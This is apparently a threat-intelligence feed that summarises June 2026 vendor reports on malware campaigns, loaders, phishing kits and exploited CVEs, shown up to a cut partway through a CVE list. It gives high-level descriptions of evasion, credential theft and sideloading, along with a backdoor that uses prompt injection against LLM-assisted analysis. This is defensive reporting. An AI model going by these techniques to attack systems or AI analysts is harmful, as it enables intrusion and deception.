RST Cloud

We have started posting sample preprocessing analyses of threat reports from our Report Hub, showcasing results from one of the first stages of our multi-stage engine. If you have any suggestions for tweet format improvement, please send us a message

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): windows: 1, code: 2, schema: 1, dump: 2

#threatreport #HighCompleteness StrikeShark: investigating a new campaign delivering Cobalt Strike through SharkLoader | 24-06-2026 Source: securelist.com/strikeshark-ca… Key details below ↓ 🧑‍💻Actors/Campaigns: Strikeshark (🧠motivation: cyber_espionage) 💀Threats: Cobalt_strike_tool, Sharkloader, Proxylogon_exploit, Dll_sideloading_technique, Dll_hijacking_technique, Fscan_tool, Searchall_tool, Pillager_tool, Sharpgpoabuse_tool, Credential_dumping_technique, 🎯Victims: Diplomatic organizations, Government organizations, Software development companies 🏭Industry: Government, Software_development 🌐Geo: Nepal, Syria, Colombian, Taiwan, Macedonia, Indonesia, Lebanon, Hong kong, Serbia, Colombia, North macedonia, Indonesian, Chinese 🔓CVEs: CVE-2016-4437 \[[Vulners](vulners.com/cve/CVE-2016-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - apache aurora (<0.18.1) - apache shiro (<1.2.5) CVE-2022-40684 \[[Vulners](vulners.com/cve/CVE-2022-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - fortinet fortiproxy (<7.0.7, 7.2.0) - fortinet fortiswitchmanager (7.0.0, 7.2.0) - fortinet fortios (<7.0.7, <7.2.2) CVE-2021-36260 \[[Vulners](vulners.com/cve/CVE-2021-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - hikvision ds-2cd2026g2-iu\/sl_firmware (-) CVE-2022-27925 \[[Vulners](vulners.com/cve/CVE-2022-2…)] - CVSS V3.1: *7.2*, - Vulners: Exploitation: True Soft: - synacor zimbra_collaboration_suite (8.8.15, 9.0.0) CVE-2024-21762 \[[Vulners](vulners.com/cve/CVE-2024-2…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - fortinet fortiproxy (<2.0.14, <7.0.15, <7.2.9, <7.4.3) - fortinet fortios (<6.0.18, <6.2.16, <6.4.15, <7.0.14, <7.2.7) CVE-2023-32315 \[[Vulners](vulners.com/cve/CVE-2023-3…)] - CVSS V3.1: *8.6*, - Vulners: Exploitation: True Soft: - igniterealtime openfire (<4.6.8, <4.7.5) CVE-2025-55182 \[[Vulners](vulners.com/cve/CVE-2025-5…)] - CVSS V3.1: *10.0*, - Vulners: Exploitation: True Soft: - facebook react (19.0.0, 19.1.0, 19.1.1, 19.2.0) CVE-2023-46747 \[[Vulners](vulners.com/cve/CVE-2023-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - f5 big-ip_access_policy_manager (le13.1.5, le14.1.5, le15.1.10, le16.1.4, le17.1.1) CVE-2023-20198 \[[Vulners](vulners.com/cve/CVE-2023-2…)] - CVSS V3.1: *10.0*, - Vulners: Exploitation: True Soft: - rockwellautomation allen-bradley_stratix_5200_firmware (<17.12.02) CVE-2024-36401 \[[Vulners](vulners.com/cve/CVE-2024-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - geoserver (<2.22.6, <2.23.6, <2.24.4, <2.25.2) - geotools (<29.6, <30.4, <31.2, 30.0, 31.0) CVE-2022-41082 \[[Vulners](vulners.com/cve/CVE-2022-4…)] - CVSS V3.1: *8.0*, - Vulners: Exploitation: True Soft: - microsoft exchange_server (2013, 2016, 2019) CVE-2021-26855 \[[Vulners](vulners.com/cve/CVE-2021-2…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - microsoft exchange_server (2013, 2016, 2019) CVE-2021-27076 \[[Vulners](vulners.com/cve/CVE-2021-2…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown Soft: - microsoft business_productivity_servers (2010) - microsoft sharepoint_foundation (2013) - microsoft sharepoint_server (2016, 2019) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1003.001, T1003.003, T1018, T1027.002, T1027.009, T1033, T1036.004, T1036.005, T1036.007, T1049, ... 🧨IOCs: - File: 10 - Path: 3 - Command: 4 - Hash: 9 - Domain: 4 💽Software: Microsoft Exchange, Microsoft SharePoint, Openfire, GeoServer, Apache Shiro, Zimbra Collaboration Suite, Microsoft Exchange Server, BIG-IP, Fortinet FortiOS, AnyConnect, ... 🔢Algorithms: aes, aes-128, blowfish, ror13, md5 🔠Functions: SetUserProcessPriorityBoost, Beacon 🗂️Win API: ShellExecuteW, CreateThread, LoadLibrary, LeaveCriticalSection, InterlockedDecrement64, SetEvent, VirtualAlloc, CreateProcessA, CreateProcessW, CreateWaitableTimerW, ... 📜Programming Languages: powershell #threatreport: The StrikeShark campaign has been identified as a sophisticated threat involving a new malware loader named SharkLoader, aimed at deploying Cobalt Strike Beacon on compromised systems. This campaign appears to leverage multiple infection vectors, primarily through the exploitation of vulnerabilities in internet-facing applications such as Microsoft Exchange, Openfire Server, and GeoServer. Notable vulnerabilities identified include CVE-2021-26855 (ProxyLogon) and CVE-2023-32315, which were exploited in attacks across various nations, indicating a broad target range that spans governmental and software development sectors globally. The attackers utilize both exploitation methods and custom droppers, with the latter often impersonating legitimate software installations. For instance, a Cisco AnyConnect installer was used as a lure, which extracted and executed malicious components while appearing legitimate to users. The SharkLoader dropper executes these components discreetly, storing them in common directories such as %APPDATA% and employs techniques to maintain persistence, including scheduled tasks and registry modifications. Once loaded, SharkLoader employs a Perfect DLL Hijacking technique to execute its malicious code without causing deadlocks due to the Windows loader lock, revealing a high level of technical sophistication. The malware also implements robust evasion techniques, such as API hooking and the use of Vectored Exception Handlers to deceitfully manage memory protections during its operations. The infection chain establishes a layered architecture where SharkLoader unpacks further malicious payloads like DscCoreR.mui and SyncRes.dat, leading to the eventual execution of Cobalt Strike Beacon shellcode. This advanced implementation allows the malware to create threads for executing its payload while actively monitoring system behavior for potential detection. Victimology suggests a dual strategy, targeting both government and commercial software development entities, hinting at potential espionage motives alongside a capacity for opportunistic exploitation of vulnerabilities across sectors. Despite distinct indicators pointing toward Chinese-speaking developers behind the tools utilized in this campaign, attribution remains preliminary as no definitive connections to known cyber threat actors have been established. In summary, the ongoing investigation surrounding the StrikeShark campaign illustrates a complex malware delivery system capable of wide-reaching attacks across various sectors, warranting careful scrutiny and preparation against such evolving technical threats.

#threatreport #HighCompleteness Analyzing TAX#TRIDENT: Fake Indian Tax Lures Pivot Across ZIP, VBS, Stego and PHP-Wrapped VBS Delivery | 23-06-2026 Source: securonix.com/blog/taxtriden… Key details below ↓ 🧑‍💻Actors/Campaigns: Tax_trident (🧠motivation: cyber_espionage, financially_motivated) 💀Threats: Steganography_technique, Sysaid_tool, Syncfuture_tool, Ytscrat, Lolbin_technique, Bitsadmin_tool, Spear-phishing_technique, 🎯Victims: Windows endpoints, India 🏭Industry: Financial 🌐Geo: China, Indian, Chinese, India 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 23 🧨IOCs: - Domain: 4 - File: 6 - IP: 8 - Path: 4 - Url: 6 - Hash: 16 💽Software: Windows installer, Windows service, curl 🔢Algorithms: zip, sha256 ⚙️Win Services: BITS 📜Programming Languages: vbscript, powershell, php, visual_basic 💻Platforms: x86 #threatreport: The TAX#TRIDENT campaign represents an ongoing cyber threat leveraging fake Indian Income Tax-themed lures to deliver malicious payloads to Windows endpoints. This operation employs three distinct delivery paths: direct ZIP file downloads, VBScript downloaders, and PHP-looking web endpoints that return malicious script content. Regardless of the delivery mechanism, each route culminates in the installation of a signed ClientSetup payload. Upon execution, this payload establishes a hidden client directory, maintains persistence through services and drivers, writes configuration settings, and initiates outbound network communications. The evolution of the TAX#TRIDENT campaign is marked not by the emergence of new malware but by the repurposing and expansion of previously documented tax-themed tactics. The campaign intertwines established behaviors seen in adverse software associated with Chinese tooling, particularly evident in file metadata and configuration naming conventions that align with known Chinese software abuse. However, while these insights reveal the type of software exploited, they do not provide definitive attribution to specific threat actors. The first delivery chain begins at a fake Indian tax assessment page leading to a ZIP file that executes a signed Windows installer. This method relies on social engineering, prompting victims to believe they are opening legitimate tax-related documents. The second chain deploys the same ClientSetup payload via a VBScript that showcases a decoy image, further obscuring the attack's true intent. The third approach adopts a unique PHP endpoint named "download.php," which serves VBScript content masked as a web application, facilitating downloads from cloud-hosted resources and subtly altering UAC behavior to facilitate the silent installation of the ManageEngine UEMS agent. Key behavioral indicators signal potential malicious activity, such as VBScript execution from unexpected web application extensions like ".php", and the presence of disguised executable tools within public directories. Additionally, unusual UAC policy modifications, silent MSI installations, and unsolicited outbound traffic to unapproved infrastructures should be heavily scrutinized.

#threatreport #LowCompleteness Payouts King Ransomware Initial Access Broker Deploys New Edgecution Malware | 23-06-2026 Source: zscaler.com/blogs/security… Key details below ↓ 🧑‍💻Actors/Campaigns: Payouts_king 💀Threats: Edgecution, 🎯Victims: Organizations 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1053.005, T1059.001, T1059.003, T1059.006, T1071.001, T1082, T1112, T1140, ... 🧨IOCs: - Path: 1 - Registry: 2 - File: 2 - Url: 4 - Hash: 2 💽Software: Microsoft Edge, Chrome, Microsoft Teams, Outlook, AutoHotKey, Microsoft Outlook, Windows registry 🔢Algorithms: sha256, zip 📜Programming Languages: python, powershell #threatreport: The Payouts King ransomware has harnessed a sophisticated technique involving a malicious Microsoft Edge browser extension dubbed Edgecution, which is used by an initial access broker. This extension exploits the Chrome native messaging protocol, allowing attackers to bypass typical browser sandbox limitations and gain extensive control over host systems. This capability enables the manipulation of the local filesystem, execution of arbitrary code, and launching of processes directly from the compromised host. The Edgecution malware employs two primary components: the malicious Edge browser extension and a Python-based backdoor. The attack vector typically begins with social engineering tactics, where the threat actor impersonates IT staff through platforms like Microsoft Teams, convincing victims to download a fake patch disguised within an encrypted ZIP file. This ZIP file contains files necessary to deploy the Edgecution malware, including a Python distribution, an extension, and an obfuscated Python script that carries out the malicious functions. Upon installation, commands from the AutoHotKey script or other scripts configure the environment, fix ZIP file headers, and create a scheduled task that executes Microsoft Edge loaded with the malicious extension. The extension masquerades as an "Edge Monitoring Agent" and establishes communication with a command-and-control (C2) server hosted on AWS. The Python backdoor acts as a bridge, executed in a headless mode, allowing the attackers to avoid drawing user attention while maintaining operational control over the compromised environment. Edgecution's functionality includes a variety of commands for malicious activities, many of which require permissions usually restricted to regular browser extensions. By using the native messaging protocol, the Edgecution extension can invoke the backdoor to perform tasks that include filesystem access and code execution. Communication between the extension and the Python backdoor is structured in JSON format, with messages indicating command types and execution results. This collaboration between the malicious extension and its Python backdoor illustrates a sophisticated method of maintaining a foothold in victim environments, marking a notable evolution in tactics employed by ransomware affiliates. The methods employed by the Payouts King attackers highlight the need for organizations to enhance their defenses against such threats, emphasizing the importance of monitoring browser extension installations, controlling native messaging configurations, and conducting user education to detect suspicious communications that mimic legitimate updates.

#threatreport #MediumCompleteness CVE-2025-54068 Laravel Livewire Credential Theft Campaign: 6,000+ Applications Compromised | 23-06-2026 Source: imperva.com/blog/cve-2025-… Key details below ↓ 🎯Victims: E commerce, Healthcare, Financial services, Education, Government, Online gambling and betting, Logistics 🏭Industry: Government, Healthcare, E-commerce, Education, Logistic 🌐Geo: Asia, Indonesian, Asian, Brazilian 🔓CVEs: CVE-2025-54068 \[[Vulners](vulners.com/cve/CVE-2025-5…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - laravel livewire (<3.6.4) 📚TTPs: ⚔️Tactics: 4 🛠️Technics: 11 🧨IOCs: - Url: 1 - File: 2 - Hash: 1 - IP: 1 - Domain: 1 - Email: 1 💽Software: Laravel Livewire, Livewire, Laravel, telegram, Unix, curl 🔢Algorithms: zip, sha256 📜Programming Languages: php #threatreport: On May 24, 2026, a major credential theft campaign exploiting CVE-2025-54068 was observed targeting Laravel Livewire applications, primarily affecting versions up to v3.6.3. This critical vulnerability arises from inadequate validation of component property updates during the hydration process, which allows unauthenticated attackers to inject malicious serialized PHP objects leading to arbitrary code execution upon deserialization. The attacker leveraged this flaw to execute a payload that fetched and executed a Bash script from their command-and-control (C2) server. The captured payload indicated that the attacker used PHPGGC gadget chains, which exploit existing legitimate PHP classes within Laravel applications. The malicious Bash shell script, identified as shoc.enz, was a lightweight 5,269 bytes in size, and served as a credential stealer. Once executed, it set up a temporary working directory, ensured no other instances were running, searched for sensitive .env files containing crucial configuration data, archived these files, and subsequently exfiltrated them to multiple C2 channels, while also cleaning up to erase forensic traces. Analysis revealed that over 6,167 applications across diverse sectors, including e-commerce, healthcare, financial services, and even governmental bodies, had their credentials compromised. The extant data included more than 1,850 database dumps and extensive email lists, indicating the active exploitation of stolen credentials. Indicators attributing the campaign to an Indonesian threat actor included linguistic elements in the malware’s code and metadata associated with the C2 infrastructure, including Telegram handles and an email address linked to multiple prior breaches in underground forums. The targeted applications encompassed a wide array of Laravel deployments, including platforms related to online gambling, education, and logistics, thereby underscoring the indiscriminate nature of the scanning efforts. Any organization utilizing unpatched Laravel Livewire v3 versions was potential prey for this extensive campaign. Overall, the operation highlights significant vulnerabilities within widely used frameworks and the severe implications of their exploitation in the cyber realm.

#tireport #ExtractedDiagrams The key diagram for the report (ML Classifier): schema: 2, filemanager: 1

#threatreport #LowCompleteness A Hidden Threat: Why DarkLoadLibrary Is Dangerous and How to Detect Its Use in Attacks | 24-06-2026 Source: bi.zone/expertise/blog… Key details below ↓ 💀Threats: Darkloadlibrary_tool, Nighthawk_tool, 🤖LLM extracted TTPs:` T1003.001, T1106, T1179, T1620 🧨IOCs: - File: 5 - Coin: 2 🔠Functions: LdrpFindLoadedDllByName, GetModuleHandle 🗂️Win API: ZONE, LdrLoadDll, NtCreateSection, NtMapViewOfSection, GetProcAddress, tMapViewOfSection, NtAllocateVirtualMemory, tMapViewOfSection it, tAllocateVirtualMemory, NtOpenSection, ... #threatreport: DarkLoadLibrary is a sophisticated tool that demonstrates how attackers manipulate low-level Windows mechanisms to bypass security systems, particularly by stealthily loading malicious code. This Dynamic Link Library (DLL) loader circumvents the standard execution notifications provided by the LoadImageNotifyRoutine, allowing attackers to execute code without triggering alerts from security tools. The operation of DarkLoadLibrary begins with the invocation of the NtCreateSection function, where a file is read at the kernel level, creating a section that holds the necessary data. Normally, this process includes mapping the section into memory via the NtMapViewOfSection function, which typically requires LoadImageNotifyRoutine's involvement. However, DarkLoadLibrary diverges from this by using the NtAllocateVirtualMemory function to allocate memory for the DLL, effectively preventing security tools from recording telemetry associated with the loading of the module. This design choice allows malware to use native API functions while avoiding potential hooks set by monitoring security tools. An example of practical implementation can be seen in the NightHawk command and control (C2) framework (version 0.2.1). NightHawk intercepts critical functions such as NtOpenSection, NtCreateSection, and NtMapViewOfSection during the LdrLoadDll call process. The interceptor acts by preventing known DLLs from loading by returning an error code when a targeted DLL attempt matches a predefined list for loading via DarkLoadLibrary. This prevents the DLL from being loaded from the KnownDll and processes it through the stealthier method enabled by DarkLoadLibrary. Once a section for the requested DLL is created, NightHawk modifies its section descriptor to ensure that the memory is allocated from the virtual memory space, which is managed directly by the Windows operating system, thus allowing all normal operations to proceed unhindered after initial interception. Metrics to confirm the presence of DarkLoadLibrary can be derived from memory access events, such as when a process like LSASS.exe is dumped using the MiniDumpWriteDump function. Calls made from memory regions that lack a corresponding file indicate the use of DarkLoadLibrary.

#threatreport #LowCompleteness EvilTokens: How “Ghost” Code Threatens US and European Businesses | 23-06-2026 Source: any.run/cybersecurity-… Key details below ↓ 💀Threats: Eviltokens_tool, Device_code_phishing_technique, 🎯Victims: Businesses, Organizations 🌐Geo: United states 🤖LLM extracted TTPs:` T1027, T1140, T1480.001, T1528, T1550.001 🔢Algorithms: aes-gcm 🗂️Win API: RUN 📜Programming Languages: javascript #threatreport: EvilTokens represents a significant cyber threat due to its sophisticated mechanism for phishing attacks, primarily targeting organizations in the United States and Europe. This phishing kit exploits the Microsoft Device Code Authentication process and operates in a manner that obfuscates its malicious intent, making it difficult for security operations center (SOC) teams to detect. Rather than directly stealing user credentials, EvilTokens entices victims to unknowingly authorize access to their accounts through legitimate login flows. The kit leverages browser-side decryption, where key elements of its phishing scheme are hidden behind AES-GCM encryption, only becoming visible after the browser decrypts and renders the content. This presents a substantial visibility gap during static URL analyses and complicates incident investigations. SOC teams can benefit from examining browser-level evidence that can lead to quicker decisions for containment. Such evidence includes tracking HTML Document Object Model (DOM) changes, monitoring HTTP requests, and analyzing URL details to understand network activity and final destinations involved in the phishing attempt. Moreover, detailed investigation of a single EvilTokens session can uncover related phishing infrastructure, as identified patterns and signatures can link to other phishing activity. This allows SOC teams to look beyond isolated incidents and detect broader campaigns that may utilize similar tactics. By generating threat intelligence based on the behavior and code patterns observed, teams are better equipped to enhance phishing signatures, implement effective custom detection methods, and perform proactive threat hunting. The inherent "ghost code" nature of EvilTokens makes the attack challenging but also highlights the importance of browser monitoring. By reconstructing the phishing logic through decrypted DOM content and correlating it with network traffic, security professionals can identify malicious code patterns, endpoints, and behaviors that could inform future detection efforts. This multi-faceted approach empowers SOC teams to effectively respond to EvilTokens as well as similar threats, thereby improving their overall security posture against evolving phishing tactics.

#threatreport #LowCompleteness macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox | 23-06-2026 Source: sentinelone.com/labs/macos-gas… Key details below ↓ 💀Threats: Bonzai, Supply_chain_technique, Amos_stealer, Hades, Shai-hulud, 🎯Victims: Macos users 🌐Geo: North korean, Dprk 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1005, T1016, T1036.005, T1041, T1057, T1059.004, T1059.006, T1071.001, T1082, T1102.002, ... 🧨IOCs: - Hash: 4 💽Software: macOS, Telegram, Linux, Chrome, Firefox, PyInstaller, Nuitka, Anthropic, Claude 🔢Algorithms: base64, aes-gcm, zip, aes 🔠Functions: getUpdates 📜Programming Languages: python, rust, cpython 💻Platforms: arm, cross-platform, apple #threatreport: The macOS.Gaslight implant, attributed to North Korean-aligned activity, is a sophisticated Rust-based backdoor that utilizes a unique approach to mislead analysts during malware analysis rather than attempting to evade sandbox detection. It embeds a payload consisting of 38 fabricated system messages aimed at casting doubt on the results of LLM-assisted triage processes. This command-and-control (C2) mechanism employs the Telegram Bot API for communication, utilizing a polling method that activates when no webhook is registered, and adheres to strict transport security using AES-GCM encryption over certificate-pinned TLS connections. The implant autonomously redacts its Telegram bot token from its runtime output, thwarting potential data recovery by security analysts. Distribution of macOS.Gaslight was initially detected following an Apple XProtect update in June 2023, though it remained undetected by static analysis at the time of that update. It is designed to prevent system sleep through a power-management assertion, ensuring continual polling and data collection even during periods of inactivity. The implant contains components for data theft, particularly targeting sensitive information such as browser histories and credentials stored in the macOS keychain, facilitated by an encoded Python script that assembles a complete data collection environment using a standalone CPython runtime fetched upon execution. Persistence mechanisms are integrated through a LaunchAgent configured to masquerade as system services, maintaining stealth within the macOS ecosystem. This technique is commonly observed among malware families associated with DPRK. Furthermore, the implementation of self-redaction of the bot token represents a proactive operational security (OPSEC) measure, significantly enhancing the resilience of the implant against analysis. The malware's design highlights an innovative tactic of prompt injection, which serves to compromise the effectiveness of AI-driven analysis by introducing complexity into the evaluation process. This characteristic distinguishes macOS.Gaslight from prior examples of malware that either leveraged AI for operational tasks or employed simpler forms of obfuscation. With its combination of robust collection capabilities, stringent C2 security, and analyst-targeting strategies, macOS.Gaslight exemplifies an emerging threat landscape where adversaries increasingly seek to exploit AI tools that are fundamental to cybersecurity efforts.

#threatreport #HighCompleteness Inside FortiBleed: Reverse Engineering the CyberStrike Harvester Behind a Global FortiGate Credential Factory | 24-06-2026 Source: arcticwolf.com/resources/blog… Key details below ↓ 🧑‍💻Actors/Campaigns: Harvester (🧠motivation: financially_motivated, information_theft) 💀Threats: Fortibleed_vuln, Cyberstrikeai_tool, Password_spray_technique, Credential_harvesting_technique, Supply_chain_technique, Impacket_tool, Hashcat_tool, Hashtopolis_tool, Kerberoasting_technique, As-rep_roasting_technique, 🎯Victims: Fortinet firewall and ssl vpn operators, Defense sector 🏭Industry: Healthcare, Energy, Chemical, Telco, Retail, Government, Iot, E-commerce, Financial, Entertainment, Transport, Education, Logistic 🌐Geo: Russian, Asia-pacific, Middle east, America, Turkey 📚TTPs: ⚔️Tactics: 7 🛠️Technics: 15 🧨IOCs: - File: 3 - IP: 2 - Hash: 6 💽Software: FortiGate, Telegram, Linux, Active Directory, MSSQL, MySQL, curl 🔢Algorithms: md5, pbkdf2, rc4, sha256 📜Programming Languages: python, javascript, golang 💻Platforms: amd64 YARA: Found #threatreport: FortiBleed is identified as a significant credential compromise campaign that specifically targets internet-accessible Fortinet FortiGate firewalls and SSL VPN gateways. The campaign leverages a sophisticated credential acquisition pipeline that includes methods such as credential stuffing, password spraying, configuration harvesting, offline cracking, and post-authentication data processing, rather than relying on traditional malware delivery mechanisms. The investigation into this campaign led to the reverse engineering of the CyberStrike Harvester binary, connecting it to the broader operational framework utilized by the FortiBleed operators. This includes the extraction of multi-protocol credentials, hash cracking, and unauthorized access to Active Directory and SMB services, ultimately facilitating data exfiltration from compromised systems. The campaign is assessed as having a severe risk level, although there is no confirmed evidence of exploitation of a Fortinet CVE as the primary means of initial access. It is believed that the operation serves as a credential brokerage, possibly a hybrid scam focusing on high-value credential harvesting. The tools used in this operation align with public descriptions of the adversaries' environment, which is characterized by a variety of tools and scripts designed for effective exploitation and credential management. The recovered assets include a sophisticated CyberStrike lab setup with a sniffer panel for traffic capture, scripts for processing PCAP files, and various utilities for cracking cryptographic hashes using platforms like Hashcat and Hashtopolis. The CyberStrike Harvester, a key component, is responsible for converting captured network data into actionable credentials and hash outputs, effectively turning traffic and configuration data into usable accesses. The campaign operates through a systematic credential-centric attack vector, utilizing methods for mass credential validation and harvesting configuration files from targeted devices. After gaining access, captured data is processed offline, resulting in the collection of a wide range of authentication artifacts, including session tokens and cookies, which are then cleaned and validated for further attacks. The actor employs a multi-stage cleaning process aimed at refining the credential data before deploying Hashcat for offline cracking efforts, indicating a methodical approach to credential extraction and validation. A notable aspect of the FortiBleed attack infrastructure is that it comprises both attacker-controlled systems and victim-assigned components, with a collaboration setup of virtual machines running Kali Linux and CyberStrike. The operators implement advanced techniques for validating and prioritizing access through protocols like Kerberos and SMB, leading to systematic internal data collection and exfiltration. The operational discipline surrounding the FortiBleed campaign underscores a repeatable and effective system for exploiting exposed exterior credentials, moving through various stages from capture to verification to data procurement. It highlights the critical need for organizations to not only patch vulnerabilities but also to implement comprehensive remediation strategies, including credential resets, validating session authenticity, and enhancing multi-factor authentication measures to mitigate potential threats from similar credential-centric operations.

#threatreport #MediumCompleteness Backdoor.Mistic: New Backdoor May be Linked to Ransomware Access Broker | 24-06-2026 Source: security.com/threat-intelli… Key details below ↓ 🧑‍💻Actors/Campaigns: Dragonforce 💀Threats: Mltbackdoor, Kongtuke, Modelorat, Qilin_ransomware, Blackbasta, Interlock, Rhysida, Akira_ransomware, 8base, Clickfix_technique, Filefix_technique, Crashfix, Winpython_tool, Lolbin_technique, Nexshield, Mintsloader, Kerberoasting_technique, Anydesk_tool, Splashtop_tool, 🎯Victims: Insurance, Education, Information technology, Professional services 🏭Industry: Education 🤖LLM extracted TTPs:` T1007, T1018, T1027, T1036, T1053.005, T1059.001, T1059.005, T1059.006, T1059.007, T1069.002, ... 🧨IOCs: - File: 12 - Hash: 9 💽Software: Node.js, Curl, WordPress, Windows File Explorer, Microsoft Teams, Chrome, GateKeeper, Active Directory 🔢Algorithms: rc4 🗂️Win API: GetModuleFileNameW, LoadLibraryW 📜Programming Languages: javascript, vbscript, python, powershell #threatreport: Backdoor.Mistic is a newly identified backdoor that has been active since April 2026, primarily utilized by the cybercrime group Woodgnat, also known as KongTuke. It has been linked with various ransomware operations, particularly Qilin, and is often deployed in conjunction with ModeloRAT, a Python-based remote access trojan (RAT). The modus operandi involves opportunistic targeting across various sectors, such as insurance, education, IT, and professional services, demonstrating a wide-ranging interest in high-value organizational access rather than focusing on specific industries. The backdoor is installed through a technique known as sideloading, using a legitimate file, MpExtMs.exe, to initiate the loading of the malicious DLL named EndpointDlp.dll. This mechanism allows Mistic to evade detection by blending in with trusted software, which enhances its stealth. Once operational, the backdoor executes commands from a command and control (C2) server entirely in memory without writing files to disk, enhancing its persistence and reducing the likelihood of detection. Key capabilities of Mistic include file manipulation, command execution, and self-termination via a kill switch to maintain access covertly over time. Woodgnat's operations are predominantly characterized by the provision of initial access rather than the final delivery of malicious payloads. The group specializes in creating durable remote access for resale to ransomware affiliates, and they utilize a variety of techniques to compromise systems. Their methods include the use of social engineering tactics to trick users into executing malicious PowerShell commands, which enable further exploitation. Additionally, Woodgnat employs an array of tools such as WinPython for running the ModeloRAT, alongside Node.js, which is leveraged to execute JavaScript and chain commands. The group has also been observed using living-off-the-land techniques, leveraging built-in Windows tools like Net.exe for reconnaissance and Curl for data exfiltration. A critical aspect of their strategy involves maintaining operational resilience through multiple C2 paths and obfuscated communications, particularly for non-domain-joined victims, indicating a highly skilled approach to evading detection. The emergence of Backdoor.Mistic marks a notable trend in the evolution of cyber threats, emphasizing the use of custom-developed malware in ransomware attacks. This escalation implies a growing sophistication within the cybercriminal landscape, shifting away from reliance on dual-use tools. Woodgnat is poised as a significant threat actor to monitor, particularly in how it may adapt and innovate in collaboration with ransomware affiliates, further complicating the threat environment.

#threatreport #HighCompleteness Chinese actor compromises thousands of Wordpress sites | 23-06-2026 Source: ctrlaltintel.com/research/Wordp… Key details below ↓ 💀Threats: Godzilla_webshell, Bestshell, Meterpreter_tool, Vshell, Snowlight, 🎯Victims: Wordpress sites, Joomla sites, Prestashop sites, Metinfo sites, Craft cms sites, Magento sites, Nacos sites, Internet facing sites 🌐Geo: Chinese 🔓CVEs: CVE-2025-6389 \[[Vulners](vulners.com/cve/CVE-2025-6…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-1357 \[[Vulners](vulners.com/cve/CVE-2026-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-13486 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-6433 \[[Vulners](vulners.com/cve/CVE-2026-6…)] - CVSS V3.1: *7.3*, - Vulners: Exploitation: Unknown CVE-2025-5394 \[[Vulners](vulners.com/cve/CVE-2025-5…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-31843 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2026-1969 \[[Vulners](vulners.com/cve/CVE-2026-1…)] - CVSS V3.1: *5.3*, - Vulners: Exploitation: True CVE-2026-4882 \[[Vulners](vulners.com/cve/CVE-2026-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2026-0740 \[[Vulners](vulners.com/cve/CVE-2026-0…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-12057 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2026-3844 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-12352 \[[Vulners](vulners.com/cve/CVE-2025-1…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2025-23921 \[[Vulners](vulners.com/cve/CVE-2025-2…)] - CVSS V3.1: *9.0*, - Vulners: Exploitation: Unknown CVE-2025-32432 \[[Vulners](vulners.com/cve/CVE-2025-3…)] - CVSS V3.1: *10.0*, - Vulners: Exploitation: True Soft: - craftcms craft_cms (<3.9.15, <4.14.15, <5.6.17) CVE-2024-34102 \[[Vulners](vulners.com/cve/CVE-2024-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - adobe commerce (2.4.2, 2.4.3, 2.4.4, 2.4.5, 2.4.6) - adobe commerce_webhooks (<1.5.0) - adobe magento (2.4.4, 2.4.5, 2.4.6, 2.4.7) CVE-2026-3300 \[[Vulners](vulners.com/cve/CVE-2026-3…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True CVE-2025-34085 \[[Vulners](vulners.com/cve/CVE-2025-3…)] - CVSS V3.1: *Unknown*, - Vulners: Exploitation: Unknown CVE-2024-6648 \[[Vulners](vulners.com/cve/CVE-2024-6…)] - CVSS V3.1: *7.5*, - Vulners: Exploitation: Unknown Soft: - apollotheme ap_pagebuilder (<4.0.0) CVE-2026-29014 \[[Vulners](vulners.com/cve/CVE-2026-2…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - metinfo (7.9, 8.0.0, 8.1) CVE-2024-8856 \[[Vulners](vulners.com/cve/CVE-2024-8…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - revmakx backup_and_staging_by_wp_time_capsule (<1.22.22) CVE-2024-2961 \[[Vulners](vulners.com/cve/CVE-2024-2…)] - CVSS V3.1: *7.3*, - Vulners: Exploitation: True Soft: - gnu glibc (<2.40) - netapp active_iq_unified_manager (-) - debian debian_linux (10.0) CVE-2026-48907 \[[Vulners](vulners.com/cve/CVE-2026-4…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: True Soft: - widgetfactorylimited jce (<2.9.99.5) CVE-2025-7852 \[[Vulners](vulners.com/cve/CVE-2025-7…)] - CVSS V3.1: *9.8*, - Vulners: Exploitation: Unknown CVE-2025-7443 \[[Vulners](vulners.com/cve/CVE-2025-7…)] - CVSS V3.1: *8.1*, - Vulners: Exploitation: Unknown CVE-2020-25213 \[[Vulners](vulners.com/cve/CVE-2020-2…)] - CVSS V3.1: *10.0*, - Vulners: 